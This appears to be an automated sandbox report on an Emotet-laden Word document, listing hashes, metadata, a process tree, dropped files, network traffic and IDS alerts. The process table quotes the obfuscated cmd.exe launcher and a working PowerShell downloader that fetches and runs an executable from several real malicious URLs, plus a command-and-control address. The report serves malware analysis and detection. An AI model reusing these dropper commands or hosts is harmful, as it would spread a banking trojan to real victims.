File name: | DOCP50669.doc |
Full analysis: | https://app.any.run/tasks/b3a751b9-c65a-47e1-856a-eed866b06972 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | November 14, 2018, 12:44:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Abby, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 11:53:00 2018, Last Saved Time/Date: Wed Nov 14 11:53:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0 |
MD5: | DDA6F58EF9C8AEB422F707E9644E963E |
SHA1: | D2B184A8FF8376CBC2DF4A97F83B60BA4300C4B9 |
SHA256: | 1771A1ACE8C8EE6896AF0B4ED0CA6B0F4539C9B095E55B223C7D5795FE768CE2 |
SSDEEP: | 1536:Qk/TxjwKZ09cB7y9ghN8+mQ90MT++a9aTjpre5gx8P5pF5pVeFq:rxjnB29gb8onVPpre5gx8P5pF5pVeFq |
.doc | | | Microsoft Word document (54.2) |
---|---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Abby |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:14 11:53:00 |
ModifyDate: | 2018:11:14 11:53:00 |
Pages: | 1 |
Words: | - |
Characters: | 2 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 2 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1388 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCP50669.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2252 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,^2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2^,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2^,47,^3^4,59^,^42^,^2^,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2^,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3^,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28^,^1^2^,^29,
5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2604 | powershell $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1380 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1548 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | mQN.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2240 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | mQN.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3820 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. |
PID | Process | Filename | Type | |
---|---|---|---|---|
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR92C5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74DCPC5Z3STEDPNW7RXL.temp | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$CP50669.doc | pgc | |
MD5:5DB47F5E643BCC3E680EF769C93F39D4 | SHA256:70DD06FE9DF0A71ACE21603EDAEF2B774679CCBD28A691C4C96852D5841DF17E | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2604 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da208.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2604 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mQN.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
1548 | mQN.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2604 | powershell.exe | GET | 200 | 66.55.141.67:80 | http://trabanatours.com/u/ | US | executable | 448 Kb | malicious |
2604 | powershell.exe | GET | 301 | 66.55.141.67:80 | http://trabanatours.com/u | US | html | 234 b | malicious |
3820 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2604 | powershell.exe | 66.55.141.67:80 | trabanatours.com | Choopa, LLC | US | suspicious |
3820 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
trabanatours.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
2604 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2604 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
2604 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3820 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |